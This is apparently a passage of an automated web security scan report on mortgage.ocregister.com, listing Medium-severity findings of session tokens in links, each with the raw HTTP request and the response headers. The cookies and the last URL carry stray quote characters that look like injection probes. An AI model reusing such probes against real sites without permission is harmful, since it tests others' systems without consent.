<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.72. http://mortgage.ocregister.com/2011/01/14/newport-home-in-squatters-case-set-for-auction/41384/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2011/01/14/newport-home-in-squatters-case-set-for-auction/41384/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2011/01/14/newport-home-in-squatters-case-set-for-auction/41384/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:07:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41384>; rel=shortlink
Last-Modified: Thu, 03 Feb 2011 19:07:49 +0000
Cache-Control: max-age=300, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.73. http://mortgage.ocregister.com/2011/01/15/poor-lender-service-dont-hold-your-breath-for-a-refund/41318/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2011/01/15/poor-lender-service-dont-hold-your-breath-for-a-refund/41318/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2011/01/15/poor-lender-service-dont-hold-your-breath-for-a-refund/41318/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:07:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41318>; rel=shortlink
Last-Modified: Thu, 03 Feb 2011 19:07:47 +0000
Cache-Control: max-age=300, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81347

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.74. http://mortgage.ocregister.com/2011/01/25/foreclosures-down-31-in-state/41514/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2011/01/25/foreclosures-down-31-in-state/41514/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2011/01/25/foreclosures-down-31-in-state/41514/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:07:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41514>; rel=shortlink
Last-Modified: Thu, 03 Feb 2011 19:07:44 +0000
Cache-Control: max-age=300, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 78404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.75. http://mortgage.ocregister.com/2011/01/26/7900-o-c-homes-seized-in-2010/41532/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2011/01/26/7900-o-c-homes-seized-in-2010/41532/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2011/01/26/7900-o-c-homes-seized-in-2010/41532/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:07:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41532>; rel=shortlink
Last-Modified: Thu, 03 Feb 2011 19:07:38 +0000
Cache-Control: max-age=300, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 114290

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.76. http://mortgage.ocregister.com/2011/01/29/3-5-million-irvine-foreclosure-hits-market/41590/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2011/01/29/3-5-million-irvine-foreclosure-hits-market/41590/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2011/01/29/3-5-million-irvine-foreclosure-hits-market/41590/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:07:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41590>; rel=shortlink
Last-Modified: Thu, 03 Feb 2011 19:07:31 +0000
Cache-Control: max-age=300, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 82957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.77. http://mortgage.ocregister.com/2011/01/29/couple-might-be-better-off-with-short-sale/41502/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2011/01/29/couple-might-be-better-off-with-short-sale/41502/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2011/01/29/couple-might-be-better-off-with-short-sale/41502/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:07:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41502>; rel=shortlink
Last-Modified: Thu, 03 Feb 2011 19:07:38 +0000
Cache-Control: max-age=300, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 77617

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.78. http://mortgage.ocregister.com/2011/02/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2011/02/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2011/02/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:07:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 68370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.79. http://mortgage.ocregister.com/2011/02/02/predatory-lending-suit-settles-for-6-5-million/41668/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2011/02/02/predatory-lending-suit-settles-for-6-5-million/41668/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2011/02/02/predatory-lending-suit-settles-for-6-5-million/41668/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:07:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
Last-Modified: Thu, 03 Feb 2011 19:06:36 +0000
Cache-Control: max-age=252, must-revalidate
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41668>; rel=shortlink
Connection: close
Content-Type: text/html
Content-Length: 83211

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.80. http://mortgage.ocregister.com/feeda71cd">